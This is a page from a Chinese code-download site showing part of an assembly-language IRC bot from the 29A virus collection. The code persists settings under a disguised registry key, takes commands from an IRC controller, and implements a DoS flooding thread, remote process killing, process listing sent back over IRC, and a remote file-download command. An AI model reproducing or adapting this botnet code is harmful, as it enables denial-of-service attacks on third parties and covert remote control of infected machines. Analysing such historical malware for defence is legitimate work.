29a-7.020

来自「从29A上收集的病毒源码」· 020 代码 · 共 3,316 行 · 第 1/5 页

020
3,316
字号
12345
bot_log_handle		dd	0
			pop	edi
			stosd
ENDIF ; IRC_LOG
			mov	eax, 200h
			call	malloc

			call	$+5+4
irc_recv_buffer		dd	0					; irc buffer
			pop	edi
			stosd
connect_to_irc:
			call	setup_registry
			jecxz	bot_end

			push	(socket_handle X).dword ptr 0
			callb	closesocket

			call	connect_to_irc_server
			jecxz	bot_end

			call	login_to_irc
			jc	connect_to_irc
			jecxz	bot_end

			call	join_channel
			jecxz	bot_end

__il: 			call	read_line
			jecxz	bot_end
			call	parse_line
			jecxz	__il

bot_end:
			;@SEH_RemoveFrame

IFDEF IRC_LOG
			push	(bot_log_handle X).dword ptr 0
			callb	CloseHandle
ENDIF ; IRC_LOG
			push	(socket_handle X).dword ptr 0
			callb	closesocket

			callb	WSACleanup

			push	0
			callb	ExitThread

setup_registry:		mov	eax, 128
			call	malloc
			xchg	eax, ebx

			x_push	eax, Software\Microsoft\Windows\CurrentVersion\OpenGLdrivers~
			mov	ecx, esp
			push	_xsize
			pop	edi
			x_push	eax, Default~
			mov	eax, esp
			add	edi, _xsize
			@pushvar <dd 128>
			push	ebx
			@pushvar <dd REG_SZ>
			push	eax
			push	ecx
			push	HKEY_LOCAL_MACHINE
			callb	SHGetValueA
			lea	esp, [esp+edi]

			xchg	eax, ecx
			jecxz	__convert

			mov	ecx, bot_password X
			call	save_hash
			jmp	__err

__convert:		push	ebx
			callb	atoi
			pop	edx
	
			xchg	eax, ecx
			jecxz	__err

			mov	bot_password X, ecx

__err:			xchg	eax, ebx
			call	free

			@retecx1

; ---------------------------------------------------------------------------
; analyzes given commands and calls corresponding subroutines
; i: automatically set after call to read_line
;
; o: error ? ecx=0 : ecx!=0
; ---------------------------------------------------------------------------
parse_line:		xchg	eax, esi				; save ptr to the end of line
			push	ecx
			mov	esi, irc_recv_buffer X
			mov	edx, esi
			x_push	ecx, :irc.				; discard irc.* 
			mov	edi, esp
			push	4
			pop	ecx
			cld
			repz	cmpsb

			x_pop
			pop	ecx
			jz	quit_oky
		
			mov	esi, edx
			lodsd
			cmp	eax, "GNIP"
			jz	pong

			mov	esi, edx
			@endspc
			cmp	[esi], "VIRP"
			jnz	quit_oky
	
			cmp	[esi+4], " GSM"
			jnz	quit_oky

			lodsd						; skip PRIVMSG + space
			lodsd
			push	esi
			lea	esi, irc_nick X
			mov	ebx, esi
			@endcr
			sub	esi, ebx
			dec	esi
			mov	ecx, esi
			pop	esi

			push	ecx esi ecx ebx
			push	NORM_IGNORECASE
			push	LOCALE_SYSTEM_DEFAULT
			callb	CompareStringA

			sub	al, 2
			jz	__private_msg

__chan_msg:		jmp	quit_oky

__private_msg:		mov	esi, irc_recv_buffer X
			mov	edx, esi
			@usklicnik

			sub	esi, edx
			sub	esi, 2					; : & !
			mov	ecx, esi				; nick length
			push	ecx					; needed 4 l8r
			mov	esi, edx
			inc	esi
			call	$+5+10
irc_cmd_nick		db	10	dup(0)
			pop	edi
			cld
			rep	movsb
			xor	al, al
			stosb						; +NULL
			pop	ecx					; length of the active nick
			call	__s

priv_msg_curr_user	db "PRIVMSG "
			db 200 dup(0)

__s:			pop	edi					; construct default PRIVMSG for current user
			scasd						; edi+=8
			scasd
			lea	esi, irc_cmd_nick X
			cld
			rep	movsb
			mov	ax, ": "				; after this comes the msg
			stosw

			mov	esi, edx
			@endspc
			lodsd						; esi+=8
			lodsd
			@dvotocka
			mov	edi, esi				; save ptr to the command
			mov	ebx, edi				; ebx is used for param. transfer
			lea	esi, cmd_dispatch_table X
			xor	ecx, ecx
__1:			add	esi, ecx
			mov	edi, ebx
			lodsb
			movzx	ecx, al
			jecxz	__unknown_cmd

			cld
			repz	cmpsb
			lodsd
			jnz	__1
			
			add	eax, ebp
			sub	eax, offset bdelta			; prior to calling, relocate hard-coded subroutine offset
			call	eax

			jecxz	bad_quit

__unknown_cmd:		jmp	quit_oky

pong:			mov	byte ptr [esi-4+1],'O'			
			mov	esi, edx
			call	irc_send
			
			jecxz	bad_quit
	
			jmp	quit_oky

bad_quit:		push	1
			pop	ecx
			jmp	$+2+2

quit_oky:		xor	ecx, ecx
			ret

bot_cmd_stopdos:	call	check_logged_in
			jnc	err_not_logged_in
			
			and	(DOS_flag X).byte ptr 0, 0
			
			@retecx1

; ---------------------------------------------------------------------------
; starts DOS attack on the target
; format: !dos <IP> <port> <packet_size> <interval_in_ms_between_packets>
; i: nothing
;
; o: error ? ecx=0 : ecx!=0
; ---------------------------------------------------------------------------
bot_cmd_dos:		call	check_logged_in
			jnc	err_not_logged_in

			movzx	ecx, (DOS_flag X).byte ptr 0
			jecxz	__okie
			
			x_push	eax, <DOS attack allready in progress.>
			push	esp
			push	32
			pop	ecx
			call	send_privmsg
			x_pop
			jmp	bot_cmd_dos_end

__okie:			lea	esi, [ebx+4+1]
			push	esi
			xor	edx, edx
__spc:			lodsb
			cmp	al, ' '
			jnz	__skip
			inc	edx
__skip:			cmp	al, CR
			jnz	__spc
			
			pop	esi
			sub	edx, 3
			jnz	err_cmd_syntax

			inc	(DOS_flag X).byte ptr 0
			call	patchspc
			push	esi
			callb	inet_addr
			mov	DOS_IP X, eax
			@endsz

			call	patchspc
			call	ascii2num
			mov	DOS_port X, eax

			call	patchspc
			call	ascii2num
			mov	DOS_packet_size X, eax
			
			call	patchspc
			call	ascii2num
			mov	DOS_interval X, eax
			
			xor	eax, eax
			push	eax
			push	esp
			push	eax
			push	eax					; thread param
			lea	ebx, bot_DOS_thread X
			push	ebx
			push	2000h
			push	eax
			callb	CreateThread
			
			pop	ecx
			push	eax
			callb	CloseHandle
			
bot_cmd_dos_end:	@retecx1
			
bot_DOS_thread		proc	pascal
			
			@SEH_SetupFrame	<jmp	__DOS_xception>
			
			call	$+5
dosdlta:		pop	ebp
			
_DOS			equ	<-dosdlta[ebp]>
			
__cycle:		xor	ebx, ebx
			push	ebx
			push	SOCK_STREAM
			push	AF_INET
			call	_socket _DOS
			
			mov	esi, eax
			inc	eax
			jz	__end

			push	ebx							; sin_zero[8]
			push	ebx
			db	068h
DOS_IP			dd	?							; sin_addr

			db	068h
DOS_port		dd	?
			call	_htons _DOS

			shl	eax, 16
			add	al, AF_INET
			push	eax
			mov	ecx, esp
						
			push	type sockaddr_in
			push	ecx
			push	esi
			call	_connect _DOS
			
			add	esp, 16
			inc	eax
			jz	__end_1
			
			db	0b8h
DOS_packet_size		dd	?
			call	malloc
			xchg	eax, ecx
			jecxz	__end_1
			
			push	ebx
			push	(DOS_packet_size _DOS).dword ptr 0
			push	ecx
			push	esi
			call	_send _DOS
			
			inc	eax
			jz	__end_1
			
			db	068h
DOS_interval		dd	?
			call	_Sleep _DOS
			
			push	esi
			call	_closesocket _DOS
			
			movzx	ecx, (DOS_flag _DOS).byte ptr 0
			jecxnz	__cycle
						
__end_1:		push	esi
			call	_closesocket _DOS
			
__end:			dec	(DOS_flag _DOS).byte ptr 0

__DOS_xception:		@SEH_RemoveFrame
			push	0
			call	_ExitThread _DOS
			
DOS_flag		db	0
bot_DOS_thread		endp

; ---------------------------------------------------------------------------
; lists currently logged in ops
; format: !opers
; i: nothing
;
; o: error ? ecx=0 : ecx!=0
; ---------------------------------------------------------------------------
bot_cmd_opers:		call	check_logged_in
			jnc	err_not_logged_in

			mov	eax, 512
			call	malloc
			
			xchg	eax, edi
			mov	ebx, edi
			x_stosd <There are currently >
			mov	eax, operators X
			push	eax
			call	num2ascii
			add	edi, eax
			x_stosd < ops logged in: >
			pop	ecx
			
			lea	esi, operators X
			lodsd
			mov	edx, esi
			
__cycle:		mov	esi, edx
__copy:			lodsb
			stosb
			test	al, al
			jnz	__copy
			
			dec	edi
			mov	ax, ' ,'
			stosw
			
			add	edx, size operator
			loop	__cycle
			dec	edi
			dec	edi
			mov	al, '.'
			stosb
			
			mov	ax, CRLF_HEX
			stosw
			mov	ecx, edi
			sub	ecx, ebx
			
			push	ebx
			call	send_privmsg
			
			push	ecx
			mov	eax, ebx
			call	free
			pop	ecx
			jecxz	$+2+3
			push	1
			pop	ecx
			ret

; ---------------------------------------------------------------------------
; kills a process having specified PID
; format: !kill <PID>
; i: nothing
;
; o: error ? ecx=0 : ecx!=0
; ---------------------------------------------------------------------------
bot_cmd_kill:		call	check_logged_in
			jnc	err_not_logged_in
			
			lea	esi, [ebx+5+1]
			call	patchcr
			
			call	ascii2num
			
			push	eax
			push	0
			push	PROCESS_TERMINATE
			callb	OpenProcess
			
			push	0
			push	eax
			callb	TerminateProcess
			
			@retecx1
			
; ---------------------------------------------------------------------------
; list active processes on the system. displayes PATH & PID
; format: !procs
; i: nothing
;
; o: error ? ecx=0 : ecx!=0
; ---------------------------------------------------------------------------
bot_cmd_procs:		call	check_logged_in
			jnc	err_not_logged_in
			
			xor	eax, eax
			push	eax
			push	esp
			push	eax
			push	eax					; thread param
			lea	ebx, bot_procs_thread X
			push	ebx
			push	2000h
			push	eax
			callb	CreateThread
			
			pop	ecx
			push	eax
			callb	CloseHandle
			
			@retecx1

bot_procs_thread	proc	pascal

			local	p_handle
			local	p_entry:PROCESSENTRY32
			local	msg
			
			@SEH_SetupFrame	<jmp	__procs_exception>
			
			call	$+5
procsdlta:		pop	ebx

_PD			equ	<-procsdlta[ebx]>

			mov	eax, 512
			call	malloc	

			xchg	eax, edi
			mov	msg, edi
			
			x_stosd	<PRIVMSG >
			lea	esi, irc_cmd_nick _PD
			push	esi
			@endsz
			sub	esi, [esp]
			lea	ecx, [esi-1]
			pop	esi
			cld
			rep	movsb
			mov	ax, ": "
			stosw
			push	edi
			
			push	0
			push	TH32CS_SNAPPROCESS
			call	_CreateToolhelp32Snapshot _PD
			
			inc	eax
			jz	__end
			dec	eax
			mov	p_handle, eax

			lea	ecx, p_entry
			mov	[ecx.dwSize], size PROCESSENTRY32
			push	ecx
			push	eax
			call	_Process32First _PD
			
			test	eax, eax
			jz	__end_1

__cycle:		pop	edi
			push	edi
			lea	esi, p_entry.szExeFile
__copy:			lodsb
			stosb
			test	al, al
			jnz	__copy
			
			dec	edi
			x_stosd < - PID: >
			mov	eax, p_entry.th32ProcessID
			call	num2ascii
			add	edi, eax
			
			mov	ax, CRLF_HEX
			stosw
			mov	ecx, edi
			sub	ecx, msg
IFDEF IRC_LOG
			pusha
			xor	eax, eax
			push	eax esp ecx msg
			push	(bot_log_handle _PD).dword ptr 0
			call	_WriteFile _PD
			popa
ENDIF ; IRC_LOG
			pusha
			push	0
			push	ecx
			push	msg
			push	(socket_handle _PD).dword ptr 0
			call	_send _PD
			
			mov	[esp.Pushad_ecx], eax
			popa

			jecxz	__end_1
			inc	ecx
			jecxz	__end_1
			
			mov	esi, edx
			push	1500
			call	_Sleep _PD
			
			lea	eax, p_entry
			push	eax
			push	p_handle
			call	_Process32Next _PD
			
			test	eax, eax
			jnz	__cycle
			pop	eax
			
__end_1:		push	p_handle
			call	_CloseHandle _PD
			
__end:			mov	eax, msg
			call	free

			leave
__procs_exception:	@SEH_RemoveFrame
			push	0
			call	_ExitThread _PD

			
bot_procs_thread	endp

; ---------------------------------------------------------------------------
; downloads a file from http|ftp resource
; format: !download <url> <file_name_to_save_to>
; i: nothing
;
; o: error ? ecx=0 : ecx!=0
; ---------------------------------------------------------------------------
bot_cmd_download:	call	check_logged_in
			jnc	err_not_logged_in

			lea	esi, [ebx+9+1]
			xor	edx, edx
			push	esi
			
__spc:			lodsb
			cmp	al, ' '
			jz	__skip
			inc	edx
__skip:			cmp	al, CR
			jnz	__spc
			dec	edx
			pop	esi
			jnz	err_cmd_syntax
			
			call	patchspc
			
			mov	eax, 516
			call	malloc
			xchg	eax, edi
			mov	ebx, edi
__copy:			lodsb
			stosb
			test	al, al
			jnz	__copy
			
			call	patchcr
			
			xor	eax, eax
			push	eax
			push	eax
			push	CREATE_ALWAYS
			push	eax
			push	FILE_SHARE_READ
			push	GENERIC_WRITE
			push	esi
			callb	CreateFileA
			inc	eax
			jz	__err
			dec	eax
			stosd

			xor	eax, eax
			push	eax
			push	esp
			push	eax
			push	ebx					; thread param
			lea	ebx, bot_download_thread X
12345

29a-7.020 - 源码说明

本页面展示了「从29A上收集的病毒源码」中的 29a-7.020 源码文件,采用 020 编程语言编写,共 3,316 行代码。您可以在线阅读完整代码内容,也可以返回资源详情页下载完整源码包进行本地学习和开发。

虫虫下载站收录了大量与29A相关的技术资源,包括源代码、技术文档、电路图等,是电子工程师和嵌入式开发者的专业学习平台。

⌨️ 快捷键说明

复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?